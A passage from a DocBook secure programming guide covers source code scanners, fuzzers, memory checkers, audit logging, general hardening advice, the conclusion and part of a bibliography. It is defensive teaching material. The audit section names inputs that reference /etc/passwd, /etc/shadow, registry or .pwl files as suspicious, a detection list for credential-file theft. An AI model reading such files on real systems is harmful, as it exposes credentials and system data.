||
<para>
|
||
One obvious type of tool is a program to examine the source code
|
||
to search for patterns of known potential security problems
|
||
(e.g., calls to library functions in ways are often the source
|
||
of security vulnerabilities).
|
||
These kinds of programs are called ``source code scanners''.
|
||
Here are a few such tools:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
Flawfinder, which I've developed; it's available at
|
||
<ulink url="http://www.dwheeler.com/flawfinder">http://www.dwheeler.com/flawfinder</ulink>.
|
||
This is also a program that scans C/C++ source code for common problems,
|
||
and is also licensed under the GPL.
|
||
Unlike RATS, flawfinder is implemented in Python.
|
||
The developers of RATS and Flawfinder have agreed to find a way to
|
||
work together to create a single ``best of breed'' open source program.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
RATS (Rough Auditing Tool for Security)
|
||
from Secure Software Solutions is available at
|
||
<ulink url="http://www.securesw.com/rats">http://www.securesw.com/rats</ulink>.
|
||
This program scans C/C++ source code for common problems, and
|
||
is licensed under the GPL.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
ITS4 from Cigital (formerly Reliable Software Technologies, RST)
|
||
also statically checks C/C++ code.
|
||
It is available free for non-commercial use, including its source code
|
||
and with certain modification and redistribution rights.
|
||
Note that this isn't released as ``open source'' as defined by the
|
||
<ulink url="http://www.opensource.org/osd.html">Open
|
||
Source Definition</ulink> (OSD) -
|
||
In particular, OSD point 6 forbids
|
||
``non-commercial use only'' clauses in open source licenses.
|
||
ITS4 is available at
|
||
<ulink url="http://www.rstcorp.com/its4">http://www.rstcorp.com/its4</ulink>.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Splint (formerly named LCLint) is a tool for statically checking C programs.
|
||
With minimal effort, splint can be used as a better lint.
|
||
If additional effort is invested adding annotations to programs,
|
||
splint can perform stronger checking than can be done by any standard lint.
|
||
For example, it can be used to statically detect likely buffer overflows.
|
||
The software is licensed under the GPL and is available at
|
||
<ulink url="http://www.splint.org">http://www.splint.org</ulink>.
|
||
<!-- <ulink url="http://lclint.cs.virginia.edu">http://lclint.cs.virginia.edu</ulink>.
|
||
-->
|
||
</para></listitem>
|
||
<listitem><para>
|
||
cqual is a type-based analysis tool for finding bugs in C programs. cqual
|
||
extends the type system of C with extra user-defined type qualifiers,
|
||
e.g., it can note that values are ``tainted'' or ``untainted''
|
||
(similar to Perl's taint checking). The
|
||
programmer annotates their program in a few places, and cqual performs
|
||
qualifier inference to check whether the annotations are correct. cqual
|
||
presents the analysis results using Program Analysis Mode, an emacs-based
|
||
interface.
|
||
The current version of cqual can detect potential format-string
|
||
vulnerabilities in C programs.
|
||
A previous incarnation of cqual, Carillon,
|
||
has been used to find Y2K bugs in C programs.
|
||
The software is licensed under the GPL and is available from
|
||
<ulink url="http://www.cs.berkeley.edu/Research/Aiken/cqual">http://www.cs.berkeley.edu/Research/Aiken/cqual</ulink>.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Cyclone is a C-like language intended to remove C's security weaknesses.
|
||
In theory, you can always switch to a language that is ``more secure,''
|
||
but this doesn't always help (a language can help you avoid common mistakes
|
||
but it can't read your mind).
|
||
<ulink url="http://www.securityfocus.com/guest/9094">John Viega has
|
||
reviewed Cyclone</ulink>, and in December 2001 he said:
|
||
``Cyclone is definitely a neat language.
|
||
It's a C dialect that doesn't feel like it's taking away any power,
|
||
yet adds strong safety guarantees, along with numerous features that
|
||
can be a real boon to programmers.
|
||
Unfortunately, Cyclone isn't yet ready for prime time.
|
||
Even with crippling limitations aside, it doesn't yet offer
|
||
enough advantages over Java (or even C with a good set of tools)
|
||
to make it worth the risk of using what is still a very young technology.
|
||
Perhaps in a few years, Cyclone will mature into a robust,
|
||
widely supported language that comes dangerously
|
||
close to C in terms of efficiency.
|
||
If that day comes, you'll certainly see me abandoning C for good.''
|
||
The Cyclone compiler has been released under the GPL and LGPL.
|
||
You can get more information from the
|
||
<ulink url="http://www.research.att.com/projects/cyclone">
|
||
Cyclone web site</ulink>.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para>
|
||
|
||
<para>
|
||
Some tools try to detect potential security flaws at run-time,
|
||
either to counter them or at least to warn the developer about them.
|
||
Much of Crispen Cowan's work, such as StackGuard, fits here.
|
||
</para>
|
||
|
||
<para>
|
||
There are several tools that try to detect various C/C++ memory-management
|
||
problems; these are really general-purpose software quality improvement
|
||
tools, and not specific to security, but memory management problems
|
||
can definitely cause security problems.
|
||
An especially capable tool is
|
||
<ulink url="http://developer.kde.org/~sewardj">Valgrind</ulink>,
|
||
which detects various memory-management problems
|
||
(such as use of uninitialized memory, reading/writing memory after it's been
|
||
free'd, reading/writing off the end of malloc'ed blocks,
|
||
and memory leaks).
|
||
Another such tool is Electric Fence (efence) by Bruce Perens, which can
|
||
detect certain memory management errors.
|
||
<ulink url="http://www.linkdata.se/sourcecode.html">Memwatch</ulink>
|
||
(public domain) and
|
||
<ulink url="http://odin.ac.hmc.edu/~neldredge/yamd/">YAMD</ulink> (GPL)
|
||
can detect memory allocation problems for C and C++.
|
||
You can even use the built-in capabilities of the
|
||
GNU C library's malloc library, which has the
|
||
MALLOC_CHECK_ environment variable (see its manual page for more information).
|
||
There are many others.
|
||
</para>
|
||
|
||
|
||
<para>
|
||
Another approach is to create test patterns and run the program,
|
||
in attempt to find weaknesses in the program.
|
||
Here are a few such tools:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
BFBTester, the Brute Force Binary Tester, is licensed under the GPL.
|
||
This program does quick security checks of binary programs.
|
||
BFBTester performs checks of single and multiple argument
|
||
command line overflows and environment variable overflows.
|
||
Version 2.0 and higher can also watch for tempfile creation activity
|
||
(to check for using unsafe tempfile names).
|
||
At one time BFBTester didn't run on Linux (due to
|
||
a technical issue in Linux's POSIX threads implementation), but this
|
||
has been fixed as of version 2.0.1.
|
||
More information is available at
|
||
<ulink url="http://bfbtester.sourceforge.net/">http://bfbtester.sourceforge.net/</ulink>
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
The
|
||
<ulink url="http://fuzz.sourceforge.net">fuzz</ulink>
|
||
program
|
||
is a tool for testing other software.
|
||
It tests programs by bombarding the program being evaluated with random data.
|
||
This tool isn't really specific to security.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
<ulink url="http://www.immunitysec.com/spike.html">SPIKE</ulink>
|
||
is a "fuzzer creation kit", i.e., it's a toolkit designed to
|
||
create "random" tests to find security problems.
|
||
The SPIKE toolkit is particularly designed for protocol analysis by
|
||
simulating network protocol clients, and SPIKE proXy is a tool built on
|
||
SPIKE to test web applications.
|
||
SPIKE includes a few pre-canned tests.
|
||
SPIKE is licensed under the GPL.
|
||
</para></listitem>
|
||
|
||
</itemizedlist>
|
||
</para>
|
||
|
||
<para>
|
||
There are a number tools that try to give you insight into running
|
||
programs that can also be useful when trying to find security problems
|
||
in your code.
|
||
This includes symbolic debuggers (such as gdb) and trace programs
|
||
(such as strace and ltrace).
|
||
One interesting program to support analysis of running code is
|
||
<ulink url="http://razor.bindview.com/tools/fenris">
|
||
Fenris</ulink> (GPL license).
|
||
Its documentation describes Fenris as a
|
||
``multipurpose tracer, stateful analyzer and partial decompiler
|
||
intended to simplify bug tracking,
|
||
security audits, code, algorithm or protocol analysis -
|
||
providing a structural program trace, general information
|
||
about internal constructions, execution path,
|
||
memory operations, I/O, conditional expressions and much more.''
|
||
Fenris actually supplies a whole suite of tools, including
|
||
extensive forensics capabilities and
|
||
<ulink url="http://lcamtuf.coredump.cx/fdesk.jpg">a
|
||
nice debugging GUI for Linux</ulink>.
|
||
A list of other promising open source tools that can be suitable
|
||
for debugging or code analysis is available at
|
||
<!-- was: http://lcamtuf.coredump.cx/fenris/other.txt -->
|
||
<ulink url="http://lcamtuf.coredump.cx/fenris/debug-tools.html">
|
||
http://lcamtuf.coredump.cx/fenris/debug-tools.html</ulink>.
|
||
Another interesting program along these lines is Subterfugue,
|
||
which allows you to control what happens in every system call made
|
||
by a program.
|
||
</para>
|
||
|
||
<para>
|
||
If you're building a common kind of product where many standard
|
||
potential flaws exist (like an ftp server or firewall), you might
|
||
find standard security scanning tools useful.
|
||
One good one is
|
||
<ulink url="http://www.nessus.org">Nessus</ulink>; there are many others.
|
||
These kinds of tools are very useful for doing regression testing,
|
||
but since they essentially use a list of past specific vulnerabilities
|
||
and common configuration errors,
|
||
they may not be very helpful in finding problems in new programs.
|
||
</para>
|
||
|
||
<para>
|
||
Often, you'll need to call on other tools to implement your secure
|
||
infrastructure.
|
||
The
|
||
<ulink url="http://ospkibook.sourceforge.net">
|
||
Open-Source PKI Book</ulink>
|
||
describes a number of open source programs for
|
||
implmenting a public key infrastructure (PKI).
|
||
</para>
|
||
|
||
<para>
|
||
Of course, running a ``secure'' program on an insecure platform
|
||
configuration makes little sense.
|
||
You may want to examine hardening systems, which attempt to configure
|
||
or modify systems to be more resistant to attacks.
|
||
For Linux, one hardening system is
|
||
Bastille Linux, available at
|
||
<ulink url="http://www.bastille-linux.org">http://www.bastille-linux.org</ulink>.
|
||
</para>
|
||
|
||
|
||
</sect1>
|
||
<sect1 id="windows-ce">
|
||
<title>Windows CE</title>
|
||
|
||
<para>
|
||
If you're securing a Windows CE Device, you should read
|
||
Maricia Alforque's
|
||
"Creating a Secure Windows CE Device" at
|
||
<ulink url="http://msdn.microsoft.com/library/techart/winsecurity.htm">http://msdn.microsoft.com/library/techart/winsecurity.htm</ulink>.
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="write-audit-records">
|
||
<title>Write Audit Records</title>
|
||
|
||
<para>
|
||
Write audit logs for program startup, session startup, and
|
||
for suspicious activity.
|
||
Possible information of value includes date, time, uid, euid, gid, egid,
|
||
terminal information, process id, and command line values.
|
||
You may find the function syslog(3) helpful for implementing audit logs.
|
||
One awkward problem is that any logging system should be able to record
|
||
a lot of information (since this information could be very helpful), yet
|
||
if the information isn't handled carefully the information itself could be
|
||
used to create an attack.
|
||
After all, the attacker controls some of the input being sent to the program.
|
||
When recording data sent by a possible attacker,
|
||
identify a list of ``expected'' characters and
|
||
escape any ``unexpected'' characters so that the log isn't corrupted.
|
||
Not doing this can be a real problem; users may include characters
|
||
such as control characters (especially NIL or end-of-line) that
|
||
can cause real problems.
|
||
For example, if an attacker embeds a newline, they can then forge
|
||
log entries by following the newline with the desired log entry.
|
||
Sadly, there doesn't seem to be a standard convention for escaping these
|
||
characters.
|
||
I'm partial to the URL escaping mechanism
|
||
(%hh where hh is the hexadecimal value of the escaped byte) but there
|
||
are others including the C convention (\ooo for the octal value and \X
|
||
where X is a special symbol, e.g., \n for newline).
|
||
There's also the caret-system (^I is control-I), though that doesn't
|
||
handle byte values over 127 gracefully.
|
||
</para>
|
||
|
||
<para>
|
||
There is the danger that a user could create a denial-of-service attack
|
||
(or at least stop auditing)
|
||
by performing a very large number of events that cut an audit record until
|
||
the system runs out of resources to store the records.
|
||
One approach to counter to this threat is to rate-limit audit record
|
||
recording; intentionally slow down the response rate
|
||
if ``too many'' audit records are being cut.
|
||
You could try to slow the response rate only to the suspected attacker,
|
||
but in many
|
||
situations a single attacker can masquerade as potentially many users.
|
||
</para>
|
||
|
||
<para>
|
||
Selecting what is ``suspicious activity'' is, of course, dependent on
|
||
what the program does and its anticipated use.
|
||
Any input that fails the filtering checks discussed earlier is
|
||
certainly a candidate (e.g., containing NIL).
|
||
Inputs that could not result from normal use should probably be logged,
|
||
e.g., a CGI program where certain required fields are missing
|
||
in suspicious ways.
|
||
Any input with phrases like /etc/passwd or /etc/shadow
|
||
or the like is very suspicious in many cases.
|
||
Similarly, trying to access Windows ``registry'' files or .pwl files
|
||
is very suspicious.
|
||
</para>
|
||
|
||
<para>
|
||
Do not record passwords in an audit record.
|
||
Often people accidentally enter passwords for a different system,
|
||
so recording a password may allow a system administrator to break into a
|
||
different computer outside the administrator's domain.
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="physical-emissions">
|
||
<title>Physical Emissions</title>
|
||
<para>
|
||
Although it's really outside the scope of this book, it's
|
||
important to remember that computing and communications equipment leaks a lot
|
||
information that makes them hard to really secure.
|
||
Many people are aware of TEMPEST requirements which deal with
|
||
radio frequency emissions of computers, displays, keyboards, and other
|
||
components which can be eavesdropped.
|
||
The light from displays can also be eavesdropped, even if it's bounced off an
|
||
office wall at great distance
|
||
[Kuhn 2002].
|
||
Modem lights are also enough to determine the underlying communication.
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="miscellaneous">
|
||
<title>Miscellaneous</title>
|
||
|
||
<para>
|
||
The following are miscellaneous security guidelines that I couldn't
|
||
seem to fit anywhere else:
|
||
</para>
|
||
|
||
<para>
|
||
Have your program check at least some of its assumptions before it uses them
|
||
(e.g., at the beginning of the program).
|
||
For example, if you depend on the ``sticky'' bit being set on a given
|
||
directory, test it; such tests take little time and could prevent
|
||
a serious problem.
|
||
If you worry about the execution time of some tests on each call, at least
|
||
perform the test at installation time, or even better at least
|
||
perform the test on application start-up.
|
||
</para>
|
||
|
||
<para>
|
||
If you have a built-in scripting language, it may be possible for the
|
||
language to set an environment variable which adversely affects the
|
||
program invoking the script.
|
||
Defend against this.
|
||
</para>
|
||
|
||
<para>
|
||
If you need a complex configuration language,
|
||
make sure the language has a comment
|
||
character and include a number of commented-out secure examples.
|
||
Often '#' is used for commenting, meaning ``the rest
|
||
of this line is a comment''.
|
||
</para>
|
||
|
||
<para>
|
||
If possible, don't create setuid or setgid root programs;
|
||
make the user log in as root instead.
|
||
</para>
|
||
|
||
<para>
|
||
Sign your code. That way, others can check to see if what's available
|
||
was what was sent.
|
||
</para>
|
||
|
||
<para>
|
||
In some applications you may need to worry about timing attacks,
|
||
where the variation in timing or CPU utilitization is enough to give
|
||
away important information.
|
||
This kind of attack has been used to obtain keying information from
|
||
Smartcards, for example.
|
||
Mauro Lacy has
|
||
published a paper titled
|
||
<ulink url="http://maurol.com.ar/security/RTT.pdf">Remote Timing Techniques</ulink>,
|
||
showing that you can (in some cases) determine over an Internet
|
||
whether or not a given user id exists, simply from the effort expended
|
||
by the CPU
|
||
(which can be detected remotely using techniques described in the paper).
|
||
The only way to deal with these sorts of problems is to make sure that
|
||
the same effort is performed even when it isn't necessary.
|
||
The problem is that in some cases this may make the system more vulnerable
|
||
to a denial of service attack, since it can't optimize away unnecessary work.
|
||
</para>
|
||
|
||
<para>
|
||
Consider statically linking secure programs.
|
||
This counters attacks on the dynamic link library mechanism
|
||
by making sure that the secure programs don't use it.
|
||
There are several downsides to this however.
|
||
This is likely to increase disk and memory use (from multiple copies of the
|
||
same routines).
|
||
Even worse, it makes updating of libraries
|
||
(e.g., for security vulnerabilities) more difficult - in most systems
|
||
they won't be automatically updated and have to be tracked and
|
||
implemented separately.
|
||
</para>
|
||
|
||
<para>
|
||
When reading over code, consider all the cases where a match is not made.
|
||
For example, if there is a switch statement, what happens when none of the
|
||
cases match?
|
||
If there is an ``if'' statement, what happens when the condition is false?
|
||
</para>
|
||
|
||
<para>
|
||
Merely ``removing'' a file doesn't eliminate the file's data from a disk;
|
||
on most systems this simply marks the content as ``deleted'' and makes it
|
||
eligible for later reuse, and often data is at least temporarily stored
|
||
in other places (such as memory, swap files, and temporary files).
|
||
Indeed, against a determined attacker, writing over the data isn't enough.
|
||
A classic paper on the problems of erasing magnetic media is
|
||
Peter Gutmann's paper
|
||
<ulink url="http://www-tac.cisco.com/Support_Library/field_alerts/fn13070.html">
|
||
``Secure Deletion of Data from Magnetic and Solid-State Memory''</ulink>.
|
||
A determined adversary can use other means, too, such as monitoring
|
||
electromagnetic emissions from computers (military systems have to obey
|
||
TEMPEST rules to overcome this)
|
||
and/or surreptitious attacks (such as monitors hidden in keyboards).
|
||
</para>
|
||
|
||
<para>
|
||
When fixing a security vulnerability,
|
||
consider adding a ``warning'' to detect and log an attempt to
|
||
exploit the (now fixed) vulnerability.
|
||
This will reduce the likelihood of an attack, especially if there's
|
||
no way for an attacker to predetermine if the attack will work,
|
||
since it exposes an attack in progress.
|
||
In short, it turns a vulnerability into an intrusion detection system.
|
||
This also suggests that exposing the version of a server program
|
||
before authentication is usually a bad idea for security, since doing so
|
||
makes it easy for an attacker to only use attacks that would work.
|
||
Some programs make it possible for users to intentionally ``lie'' about their
|
||
version, so that attackers will use the ``wrong attacks'' and be detected.
|
||
Also, if the vulnerability can be triggered over a network, please make
|
||
sure that security scanners can detect the vulnerability.
|
||
I suggest contacting Nessus
|
||
(<ulink url="http://www.nessus.org">http://www.nessus.org</ulink>)
|
||
and make sure that their open source security scanner can detect the
|
||
problem.
|
||
That way, users who don't check their software for upgrades
|
||
will at least learn about the problem during their security vulnerability
|
||
scans (if they do them as they should).
|
||
</para>
|
||
|
||
<para>
|
||
Always include in your documentation contact information for
|
||
where to report security problems.
|
||
You should also support at least one of the common email addresses
|
||
for reporting security problems
|
||
(security-alert@SITE, secure@SITE, or security@SITE);
|
||
it's often good to have support@SITE and info@SITE working as well.
|
||
Be prepared to support industry practices by those who have a security
|
||
flaw to report, such as the
|
||
<ulink url="http://www.wiretrip.net/rfp/policy.html">
|
||
Full Disclosure Policy (RFPolicy)
|
||
</ulink>
|
||
and the IETF Internet draft,
|
||
``Responsible Vulnerability Disclosure Process''.
|
||
<!--
|
||
http://www.ietf.org/internet-drafts/draft-christey-wysopal-vuln-disclosure-00.txt
|
||
http://slashdot.org/article.pl?sid=02/02/21/0559238&mode=thread&tid=9.4
|
||
-->
|
||
It's important to quickly work with anyone who
|
||
is reporting a security flaw; remember that they are doing you a favor
|
||
by reporting the problem to you, and that they are under no obligation
|
||
to do so.
|
||
It's especially important, once the problem is fixed, to give proper credit
|
||
to the reporter of the flaw (unless they ask otherwise).
|
||
Many reporters provide the information solely to gain the credit,
|
||
and it's generally accepted that credit is owed to the reporter.
|
||
Some vendors argue that people should never report vulnerabilities to the
|
||
public; the problem with this argument is that this was once common, and the
|
||
result was vendors who denied vulnerabilities while their customers were
|
||
getting constantly subverted for years at a time.
|
||
</para>
|
||
|
||
<!-- ??? maybe someday add Logging discussion -->
|
||
|
||
<para>
|
||
Follow best practices and common conventions when leading a
|
||
software development project.
|
||
If you are leading an open source software / free software project,
|
||
some useful guidelines can be found in
|
||
<ulink url="http://www.tldp.org/HOWTO/Software-Proj-Mgmt-HOWTO/index.html">
|
||
Free Software Project Management HOWTO</ulink> and
|
||
<ulink url="http://www.tldp.org/HOWTO/Software-Release-Practice-HOWTO/index.html">
|
||
Software Release Practice HOWTO</ulink>;
|
||
you should also read
|
||
<ulink url="http://www.catb.org/~esr/writings/cathedral-bazaar">
|
||
The Cathedral and the Bazaar</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
Every once in a while, review security guidelines like this one.
|
||
At least re-read the conclusions in <xref linkend="conclusion">,
|
||
and feel free to go back to the introduction
|
||
(<xref linkend="introduction">) and start again!
|
||
</para>
|
||
|
||
|
||
</sect1>
|
||
|
||
|
||
</chapter>
|
||
|
||
|
||
<chapter id="conclusion">
|
||
<title>Conclusion</title>
|
||
|
||
<epigraph>
|
||
<attribution>Ecclesiastes 7:8 (NIV)</attribution>
|
||
<para>
|
||
The end of a matter is better than its beginning, and
|
||
patience is better than pride.
|
||
</para>
|
||
</epigraph>
|
||
|
||
<para>
|
||
Designing and implementing a truly secure program
|
||
is actually a difficult task on Unix-like systems such as Linux and Unix.
|
||
The difficulty is that a truly secure program must respond
|
||
appropriately to all possible inputs and environments
|
||
controlled by a potentially hostile user.
|
||
Developers of secure programs must deeply understand their platform,
|
||
seek and use guidelines (such as these), and then use assurance
|
||
processes (such as inspections and other peer review techniques)
|
||
to reduce their programs' vulnerabilities.
|
||
</para>
|
||
|
||
<para>
|
||
In conclusion, here are some of the key guidelines in this book:
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
|
||
<para>
|
||
Validate all your inputs, including command line inputs,
|
||
environment variables, CGI inputs, and so on.
|
||
Don't just reject ``bad'' input; define what is an ``acceptable'' input
|
||
and reject anything that doesn't match.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
Avoid buffer overflow.
|
||
Make sure that long inputs (and long intermediate data values) can't
|
||
be used to take over your program.
|
||
This is the primary programmatic error at this time.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
Structure program internals.
|
||
Secure the interface, minimize privileges, make the initial configuration
|
||
and defaults safe, and fail safe.
|
||
Avoid race conditions (e.g., by safely opening any files in a shared
|
||
directory like /tmp).
|
||
Trust only trustworthy channels
|
||
(e.g., most servers must not trust their clients for security checks or
|
||
other sensitive data such as an item's price in a purchase).
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
Carefully call out to other resources.
|
||
Limit their values to valid values (in particular be concerned about
|
||
metacharacters), and check all system call return values.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
Reply information judiciously.
|
||
In particular, minimize feedback, and handle full or unresponsive output
|
||
to an untrusted user.
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
</para>
|
||
|
||
</chapter>
|
||
|
||
<chapter id="bibliography">
|
||
<title>Bibliography</title>
|
||
|
||
<epigraph>
|
||
<attribution>Ecclesiastes 12:11-12 (NIV)</attribution>
|
||
<para>
|
||
The words of the wise are like goads, their collected sayings like
|
||
firmly embedded nails--given by one Shepherd.
|
||
Be warned, my son, of anything in addition to them.
|
||
Of making many books there is no end, and much study wearies the body.
|
||
</para>
|
||
</epigraph>
|
||
|
||
<para>
|
||
<emphasis remap="it">Note that there is a heavy
|
||
emphasis on technical articles available on the web, since this is where
|
||
most of this kind of technical information is available.</emphasis>
|
||
</para>
|
||
|
||
<para>
|
||
[Advosys 2000]
|
||
Advosys Consulting
|
||
(formerly named Webber Technical Services).
|
||
<emphasis remap="it">Writing Secure Web Applications</emphasis>.
|
||
<ulink url="http://advosys.ca/tips/web-security.html">http://advosys.ca/tips/web-security.html</ulink>
|
||
<!-- was http://www.webbertech.com/tips/web-security.html -->
|
||
</para>
|
||
|
||
<para>
|
||
[Al-Herbish 1999]
|
||
Al-Herbish, Thamer.
|
||
1999.
|
||
<emphasis remap="it">Secure Unix Programming FAQ</emphasis>.
|
||
<ulink
|
||
url="http://www.whitefang.com/sup">http://www.whitefang.com/sup</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Aleph1 1996]
|
||
Aleph1.
|
||
November 8, 1996.
|
||
``Smashing The Stack For Fun And Profit''.
|
||
<emphasis remap="it">Phrack Magazine</emphasis>.
|
||
Issue 49, Article 14.
|
||
<!-- ???: may need to double-escape the ampersand here. -->
|
||
<ulink
|
||
url="http://www.phrack.com/search.phtml?view&article=p49-14">http://www.phrack.com/search.phtml?view&article=p49-14</ulink>
|
||
or alternatively
|
||
<ulink
|
||
url="http://www.2600.net/phrack/p49-14.html">http://www.2600.net/phrack/p49-14.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Anonymous 1999]
|
||
Anonymous.
|
||
October 1999.
|
||
Maximum Linux Security:
|
||
A Hacker's Guide to Protecting Your Linux Server and Workstation
|
||
Sams.
|
||
ISBN: 0672316706.
|
||
</para>
|
||
|
||
<para>
|
||
[Anonymous 1998]
|
||
Anonymous.
|
||
September 1998.
|
||
Maximum Security : A Hacker's Guide to Protecting Your
|
||
Internet Site and Network.
|
||
Sams.
|
||
Second Edition.
|
||
ISBN: 0672313413.
|
||
</para>
|
||
|
||
<para>
|
||
[Anonymous Phrack 2001]
|
||
Anonymous.
|
||
August 11, 2001.
|
||
Once upon a free().
|
||
Phrack, Volume 0x0b, Issue 0x39, Phile #0x09 of 0x12.
|
||
<ulink url="http://phrack.org/show.php?p=57&a=9">
|
||
http://phrack.org/show.php?p=57&a=9
|
||
</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[AUSCERT 1996]
|
||
Australian Computer Emergency Response Team (AUSCERT) and O'Reilly.
|
||
May 23, 1996 (rev 3C).
|
||
<emphasis remap="it">A Lab Engineers Check List for Writing Secure Unix Code</emphasis>.
|
||
<ulink
|
||
url="ftp://ftp.auscert.org.au/pub/auscert/papers/secure_programming_checklist">ftp://ftp.auscert.org.au/pub/auscert/papers/secure_programming_checklist</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Bach 1986]
|
||
Bach, Maurice J.
|
||
1986.
|
||
<emphasis remap="it">The Design of the Unix Operating System</emphasis>.
|
||
Englewood Cliffs, NJ: Prentice-Hall, Inc.
|
||
ISBN 0-13-201799-7 025.
|
||
</para>
|
||
|
||
<para>
|
||
[Beattie 2002]
|
||
Beattie, Steve, Seth Arnold, Crispin Cowan, Perry Wagle, Chris Wright,
|
||
Adam Shostack.
|
||
November 2002.
|
||
Timing the Application of Security Patches for Optimal Uptime.
|
||
2002 LISA XVI, November 3-8, 2002, Philadelphia, PA.
|
||
</para>
|
||
|
||
<para>
|
||
[Bellovin 1989]
|
||
Bellovin, Steven M.
|
||
April 1989.
|
||
"Security Problems in the TCP/IP Protocol Suite"
|
||
Computer Communications Review 2:19, pp. 32-48.
|
||
<ulink
|
||
url="http://www.research.att.com/~smb/papers/ipext.pdf">http://www.research.att.com/~smb/papers/ipext.pdf</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Bellovin 1994]
|
||
Bellovin, Steven M.
|
||
December 1994.
|
||
<emphasis remap="it">Shifting the Odds -- Writing (More) Secure Software</emphasis>.
|
||
Murray Hill, NJ: AT&T Research.
|
||
<ulink
|
||
url="http://www.research.att.com/~smb/talks">http://www.research.att.com/~smb/talks</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Bishop 1996]
|
||
Bishop, Matt.
|
||
May 1996.
|
||
``UNIX Security: Security in Programming''.
|
||
<emphasis remap="it">SANS '96</emphasis>. Washington DC (May 1996).
|
||
<ulink
|
||
url="http://olympus.cs.ucdavis.edu/~bishop/secprog.html">http://olympus.cs.ucdavis.edu/~bishop/secprog.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Bishop 1997]
|
||
Bishop, Matt.
|
||
October 1997.
|
||
``Writing Safe Privileged Programs''.
|
||
<emphasis remap="it">Network Security 1997</emphasis>
|
||
New Orleans, LA.
|
||
<ulink
|
||
url="http://olympus.cs.ucdavis.edu/~bishop/secprog.html">http://olympus.cs.ucdavis.edu/~bishop/secprog.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Blaze 1996]
|
||
Blaze, Matt, Whitfield Diffie, Ronald L. Rivest, Bruce Schneier,
|
||
Tsutomu Shimomura, Eric Thompson, and Michael Wiener.
|
||
January 1996.
|
||
``Minimal Key Lengths for Symmetric Ciphers to Provide
|
||
Adequate Commercial Security:
|
||
A Report by an Ad Hoc Group of Cryptographers and Computer Scientists.''
|
||
<ulink url="ftp://ftp.research.att.com/dist/mab/keylength.txt">
|
||
ftp://ftp.research.att.com/dist/mab/keylength.txt</ulink> and
|
||
<ulink url="ftp://ftp.research.att.com/dist/mab/keylength.ps">ftp://ftp.research.att.com/dist/mab/keylength.ps</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[CC 1999]
|
||
<emphasis remap="it">The Common Criteria for Information Technology Security Evaluation
|
||
(CC)</emphasis>.
|
||
August 1999.
|
||
Version 2.1.
|
||
Technically identical to International Standard ISO/IEC 15408:1999.
|
||
<ulink
|
||
url="http://csrc.nist.gov/cc/ccv20/ccv2list.htm">http://csrc.nist.gov/cc/ccv20/ccv2list.htm</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[CERT 1998]
|
||
Computer Emergency Response Team (CERT) Coordination Center (CERT/CC).
|
||
February 13, 1998.
|
||
<emphasis remap="it">Sanitizing User-Supplied Data in CGI Scripts</emphasis>.
|
||
CERT Advisory CA-97.25.CGI_metachar.
|
||
<ulink
|
||
url="http://www.cert.org/advisories/CA-97.25.CGI_metachar.html">http://www.cert.org/advisories/CA-97.25.CGI_metachar.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Cheswick 1994]
|
||
Cheswick, William R. and Steven M. Bellovin.
|
||
Firewalls and Internet Security: Repelling the Wily Hacker.
|
||
Full text at
|
||
<ulink url="http://www.wilyhacker.com">
|
||
http://www.wilyhacker.com</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Clowes 2001]
|
||
Clowes, Shaun.
|
||
2001.
|
||
``A Study In Scarlet - Exploiting Common Vulnerabilities in PHP''
|
||
<ulink url="http://www.securereality.com.au/archives.html">http://www.securereality.com.au/archives.html</ulink>
|
||
</para>
|
||
|
||
|
||
<para>
|
||
[CMU 1998]
|
||
Carnegie Mellon University (CMU).
|
||
February 13, 1998
|
||
Version 1.4.
|
||
``How To Remove Meta-characters From User-Supplied Data In CGI Scripts''.
|
||
<ulink
|
||
url="ftp://ftp.cert.org/pub/tech_tips/cgi_metacharacters">ftp://ftp.cert.org/pub/tech_tips/cgi_metacharacters</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Cowan 1999]
|
||
Cowan, Crispin, Perry Wagle, Calton Pu, Steve Beattie, and
|
||
Jonathan Walpole.
|
||
``Buffer Overflows: Attacks and Defenses for the Vulnerability
|
||
of the Decade''.
|
||
Proceedings of DARPA Information Survivability Conference and Expo (DISCEX),
|
||
<ulink
|
||
url="http://schafercorp-ballston.com/discex">http://schafercorp-ballston.com/discex</ulink>
|
||
SANS 2000.
|
||
<ulink
|
||
url="http://www.sans.org/newlook/events/sans2000.htm">http://www.sans.org/newlook/events/sans2000.htm</ulink>.
|
||
For a copy, see
|
||
<ulink
|
||
url="http://immunix.org/documentation.html">http://immunix.org/documentation.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Cox 2000]
|
||
Cox, Philip.
|
||
March 30, 2001.
|
||
Hardening Windows 2000.
|
||
